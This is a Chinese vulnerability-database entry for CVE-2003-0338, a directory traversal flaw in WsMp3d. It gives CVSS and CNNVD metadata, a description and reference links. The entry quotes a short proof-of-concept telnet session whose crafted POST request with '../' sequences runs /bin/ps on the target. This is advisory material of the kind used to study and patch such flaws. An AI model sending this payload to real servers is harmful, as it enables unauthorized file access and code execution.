WsMp3 daemon (WsMp3d)目录遍历漏洞-安全小百科

WsMp3 daemon (WsMp3d)目录遍历漏洞

漏洞ID	1107338	漏洞类型	路径遍历
发布时间	2003-05-21	更新时间	2003-05-21
CVE编号	CVE-2003-0338	CNNVD-ID	CNNVD-200305-050
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/22623
https://www.securityfocus.com/bid/87151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-050

|漏洞详情

WsMp3daemon(WsMp3d)0.0.10及其早期版本存在目录遍历漏洞。远程攻击者可以通过在HTTPGET或POST请求中的..（点点）序列读取和执行任意文件。

|漏洞EXP

source: http://www.securityfocus.com/bid/7645/info

A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system. 

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0

|受影响的产品

WSMP3 Wsmp3 Web Server 0.1.1

WSMP3 Wsmp3 Web Server 0.0.7

WSMP3 Wsmp3 Web Server 0.0.5

WSMP3 Wsmp3 Web Server 0.0.4

WSMP3 Wsmp3 Web Server 0.

|参考资料

来源:BUGTRAQ
名称:20030521[INetCopSecurityAdvisory]WsMP3dDirectoryTraversingVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105353168619211&w;=2
来源:VULNWATCH
名称:20030521[INetCopSecurityAdvisory]WsMP3dDirectoryTraversingVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0077.html

相关推荐: Allaire JRun 3.0 Directory Disclosure Vulnerability

Allaire JRun 3.0 Directory Disclosure Vulnerability 漏洞ID 1103790 漏洞类型 Input Validation Error 发布时间 2000-10-23 更新时间 2000-10-23 CVE编号…

文章版权归作者所有，未经允许请勿转载。

THE END